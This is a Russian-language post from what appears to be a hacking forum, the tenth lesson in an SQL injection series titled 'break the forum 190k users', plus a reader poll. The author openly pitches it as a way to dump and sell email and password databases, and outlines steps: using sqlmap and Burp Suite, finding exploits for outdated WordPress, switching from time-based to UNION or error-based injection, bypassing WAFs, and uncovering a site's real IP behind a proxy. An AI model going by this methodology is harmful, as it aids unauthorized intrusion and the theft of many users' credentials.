Загрузка...

SQL INJECTION from beginner to professional (Lesson ten) break the forum 190k users

Thread in Web vulnerabilities created by pentest May 19, 2023. (bumped Oct 23, 2023) 2349 views

The poll

Понравилась ли вам статья.Делать продолжение?

1. Да , будет круто

30
    93.8%
  2. Нет , я не разбираюсь в этом

2
    6.3%
  1. pentest
    pentest Topic starter May 19, 2023 Banned
    Приветствую!Тебе всегда было интересно , где люди достают базы данных email:pass , log:pass и другие.В разделе раздача баз для ****а?
    Или же ты просто хочешь научиться сливать базы , чтобы заработать на этом?Тогда эта статья для тебя:dance: Всё , что тебе нужно - это научиться пользоваться sqlmap`om , burp suite и искать эксплоиты под определенную версию ПО.То есть зачем изобретать велосипед , если ты ломаешь форум который на движке wordpress например.Если версия устаревшая , то есть куча эксплоитов под версию конкретную.Запомните , не нужно сразу радоваться , если вы закинули уязвимый параметр в SQLMAP и он вам выдал технику TIME BASED , вы всю свою жизнь будете сливать такой техникой сайт , потому что он будет перепроверять все [a-z] и [0-9] , а также "_".Еще для каждого символа будет задержка.Ну то есть представляете сколько времени уйдет , если бд будет 190к юзеров???Что мы можем сделать , чтобы найти другую технику , например UNION / ERROR , где данные будут выдаваться не по символам , а сразу целые слова:cool_bun:
    Давайте расскажу , как я действую кратко:
    1)Проверяю все параметры , которые есть на сайте для незарегистрированных пользователей в GET и POST
    2)Пробую обойти WAF , чтобы вместо слепой была любая другая техника
    3)Прохожу регистрацию на сайте и проверяю те параметры , которые доступны для зареганных юзеров
    4)Если ничего не вышло , то ищу поддомены и уже ищу реальный айпи адрес , чтобы запросы шли не через "посредника" а напрямую к ресурсу